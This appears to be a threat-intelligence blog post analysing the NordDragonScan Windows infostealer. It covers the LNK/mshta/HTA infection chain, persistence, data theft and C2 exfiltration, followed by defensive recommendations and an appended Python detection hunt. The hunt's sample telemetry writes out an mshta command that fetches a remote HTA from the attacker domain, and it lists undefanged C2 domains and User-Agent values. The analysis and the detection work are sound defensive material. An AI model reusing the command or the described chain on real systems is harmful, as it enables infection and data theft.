Warning: NordDragonScan Malware Attacks Windows Using LOTL Techniques

Security researchers have recently discovered a new information-stealing software named "NordDragonScan," which conducts stealthy attacks on Windows computers using "living-off-the-land" (LOTL) techniques.

  • Affected Platforms: Microsoft Windows

  • Affected Users: Microsoft Windows users

  • Impact: Stolen information may be used for future attacks

  • Severity Level: High

Initial Vector

The attacker exploits a shortened link service with the URL “hxxps://cutt[.]ly/4rnmskDe” redirecting to “hxxps://secfileshare[.]com,” which triggers the download of a RAR file named “Укрспецзв_Акт_30_05_25_ДР25_2313_13 від 26_02_2025.rar” (Ukrspetszv_Act_30_05_25_DR25_2313_13 dated 26_02_2025). This file contains a malicious LNK shortcut that silently calls mshta.exe to execute the HTA payload 1.hta from the same server.

Figure 1. LNK File

Next, the malicious HTA file copies a legitimate PowerShell.exe file to the path “C:\Users\Public\Documents\install.exe” to disguise itself. It then downloads an encrypted TXT file, decrypts it, and saves the result as Act300525.doc. This decoy document, titled “Акт здачі-приймання наданих Послуг до договору про надання послуг” (Service Acceptance Act under the Service Agreement), is harmless and intended to distract the user. Finally, the HTA script silently downloads and executes a malicious payload, an executable file named adblocker.exe, into the victim's directory “\AppData\Local\Temp\adblocker.exe”.

Figure 2. HTA File "1.hta"

Figure 3. Decoy Document from "1.hta"

The attacker's server maintains multiple fake files designed to entice user interaction. These decoy files use a similar HTA script mechanism, helping to download and execute the same payload, adblocker.exe, on compromised systems. The reuse of the same executable file across different decoy documents indicates a strategy by the attacker to maximize infection opportunities while using diverse document themes and file names to evade detection and security monitoring.

Analysis of the Malicious Payload

The malicious payload downloaded from the previous phase is a .NET executable file containing an embedded PDB path: “C:\Users\NordDragon\Documents\visual studio

NordDragonScan employs string obfuscation techniques, performing XOR operations and byte swapping to hide the code from static analysis. It then checks whether a dedicated working directory “NordDragonScan” exists in the “%LOCALAPPDATA%” directory. If this directory does not exist, it creates a new one to temporarily store stolen data before uploading it to the C2 server.

Figure 4. Checking the Directory

Next, the malware connects to the C2 server, “kpuszkiev.com,” with specific HTTP headers, notably “User-Agent: RTYUghjNM,” along with the victim's MAC address. During the initial connection, the main goal is to obtain a dynamic URL from the C2, which is then used as an endpoint to extract stolen data.

Figure 5. Obtaining the URL for Data Extraction

It then establishes persistence by adding a “NordStar” registry entry to “Software\Microsoft\Windows\CurrentVersion\Run”.

Figure 6. Adding Registry for Auto-Launch on Startup

Information Gathering Phase

After connecting, NordDragonScan moves to the information-gathering phase on the local machine. It collects basic victim information, including computer name, username, operating system version, architecture, processor count, driver information, and RAM using a combination of WMI and .NET commands. The attacker then lists all active network adapters, extracts the primary IPv4 address and subnet mask, and calculates the CIDR range. The malware then begins a slow scan of each address within the same subnet, creating a catalog of accessible hosts on the same LAN.

Figure 7. Gathering Network Information

Figure 8. Network Scanning

It also captures a screenshot and saves it as “SPicture.png” and collects data from Chrome and Firefox browsers on the victim's machine.

Figure 9. Copying Chrome Data into “Chrm”

Figure 10. Copying Firefox Data

NordDragonScan continues by scanning the local file system, including the Desktop, Documents, and Downloads folders, for files with the following extensions: “.docx,” “.doc,” “.xls,” “.ovpn,” “.rdp,” “.txt,” and “.pdf.” Each matching file is copied into the working directory and grouped by its folder of origin. When the scanning phase is complete, it makes a POST request to the C2 server. This request carries a custom header (“User-Agent: Upload” or “Backups:”) together with the name of the data it is about to send, such as “sysinfo.txt” for system information.

Figure 11. Stolen Data in the Working Directory

Figure 12. POST Request Sent by Malware to C2 Server

List of IOCs Related to NordDragonScan Malware

Domain

secfileshare[.]com
kpuszkiev[.]com


Recommendations

FPT Threat Intelligence recommends organizations and individuals take several measures to prevent information-stealing software (infostealer) like NordDragonScan and similar variants:

  • Enhance Email and Download Control: Implement strict email filtering policies to prevent downloading suspicious compressed files (.rar, .zip) or dangerous HTA scripts (.hta).

  • Monitor System Execution Behavior: Continuously monitor system processes that may be abused, such as mshta.exe, PowerShell.exe, rundll32.exe, and suspicious behaviors like remote file decryption, creating executables in temporary folders, setting registry entries for persistence, or communicating with Command & Control (C2) servers.

  • Protect Browser Data and Sensitive Information: Avoid saving automatic login information in Chrome or Firefox browsers.

  • Configure File and System Access Policies Appropriately: Apply restricted write and execute permissions in directories commonly exploited by malware, such as %LOCALAPPDATA%, %TEMP%. Enhance monitoring of sensitive file formats like .docx, .pdf, .xls, .ovpn, .rdp to prevent data leakage.

  • Conduct Security Awareness Training for End Users: Equip users with knowledge to identify fake shortcut files, document spoofing techniques, and habits to thoroughly check file origins before opening. Emphasize the importance of not installing software from shortened links or untrusted sharing sites.

  • Establish Intrusion Detection and Monitoring Systems: Monitor outbound network traffic to detect unusual data transmission to C2 servers, uncommon HTTP headers, or behaviors related to beaconing/heartbeat to unknown domains.
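As an added example that is not part of the original analysis, the following Python hunt turns the behaviours described above (mshta.exe launched with a remote .hta, PowerShell copied to install.exe, an executable run from %TEMP%, the NordStar Run-key entry, and HTTP traffic with the custom User-Agent values) into checks over endpoint and proxy telemetry. The JSON-lines record format and its field names (event, image, parent_image, original_filename, cmdline, key, value, data, host, user_agent) are an assumed, simplified schema rather than any product's real format, and the sample records are constructed.

```python
import json
import re

# Indicators reported in the analysis above: C2 domains, custom User-Agent values, renamed-PowerShell path.
C2_DOMAINS = {"secfileshare.com", "kpuszkiev.com"}
C2_USER_AGENTS = {"rtyughjnm", "upload"}
RENAMED_PS = r"c:\users\public\documents\install.exe"
RUN_KEY_RE = re.compile(r"\\currentversion\\run$", re.I)
TEMP_EXE_RE = re.compile(r"\\appdata\\local\\temp\\[^\\]+\.exe$", re.I)


def classify(rec: dict) -> list[str]:
    """Return the names of the detections that fire for one telemetry record."""
    hits, kind = [], rec.get("event")
    if kind == "process":
        image, parent = rec.get("image", "").lower(), rec.get("parent_image", "").lower()
        # Stage 1: the LNK lure hands a remote .hta to mshta.exe.
        if image.endswith("\\mshta.exe") and re.search(r"https?://\S+\.hta\b", rec.get("cmdline", ""), re.I):
            hits.append("mshta_remote_hta")
        # Stage 2: PowerShell copied to install.exe keeps its PE OriginalFileName.
        if rec.get("original_filename", "").lower() == "powershell.exe" and not image.endswith("\\powershell.exe"):
            hits.append("renamed_powershell")
        # Stage 3: an .exe run from %TEMP% by the HTA or by the renamed PowerShell.
        if TEMP_EXE_RE.search(image) and (parent.endswith("\\mshta.exe") or parent == RENAMED_PS):
            hits.append("temp_exe_from_hta_chain")
    elif kind == "registry" and RUN_KEY_RE.search(rec.get("key", "")):
        # Persistence: a Run value named NordStar, or any Run value pointing into %TEMP%.
        if rec.get("value", "").lower() == "nordstar" or TEMP_EXE_RE.search(rec.get("data", "")):
            hits.append("run_key_persistence")
    elif kind == "http":
        # Beacon / exfiltration: known C2 host, or one of the odd User-Agent values.
        if rec.get("host", "").lower() in C2_DOMAINS:
            hits.append("known_c2_domain")
        if rec.get("user_agent", "").lower() in C2_USER_AGENTS:
            hits.append("suspicious_user_agent")
    return hits


def hunt(jsonl: str) -> list[tuple[int, list[str]]]:
    """Run classify() over JSON-lines telemetry and return (line_no, hits) for every match."""
    return [(n, h) for n, line in enumerate(jsonl.splitlines(), 1)
            if line.strip() and (h := classify(json.loads(line)))]


# Constructed telemetry (not real logs): one record per stage of the chain plus one benign request.
SAMPLE_LOG = "\n".join(json.dumps(r) for r in [
    {"event": "process", "image": "C:\\Windows\\System32\\mshta.exe", "parent_image": "C:\\Windows\\explorer.exe", "cmdline": "mshta.exe https://secfileshare.com/1.hta"},
    {"event": "process", "image": "C:\\Users\\Public\\Documents\\install.exe", "parent_image": "C:\\Windows\\System32\\mshta.exe", "original_filename": "PowerShell.EXE", "cmdline": "install.exe -w hidden"},
    {"event": "process", "image": "C:\\Users\\bob\\AppData\\Local\\Temp\\adblocker.exe", "parent_image": "C:\\Users\\Public\\Documents\\install.exe", "cmdline": "adblocker.exe"},
    {"event": "registry", "key": "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run", "value": "NordStar", "data": "C:\\Users\\bob\\AppData\\Local\\Temp\\adblocker.exe"},
    {"event": "http", "host": "kpuszkiev.com", "method": "POST", "user_agent": "Upload"},
    {"event": "http", "host": "example.org", "method": "GET", "user_agent": "Mozilla/5.0"},
])
```

Running `hunt(SAMPLE_LOG)` flags the first five records and leaves the benign request alone; the Run-key and %TEMP% checks are deliberately broader than the NordStar name so that a renamed value or payload still fires.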

Written by

Tran Hoang Phong

Just a SOC Analyst ^^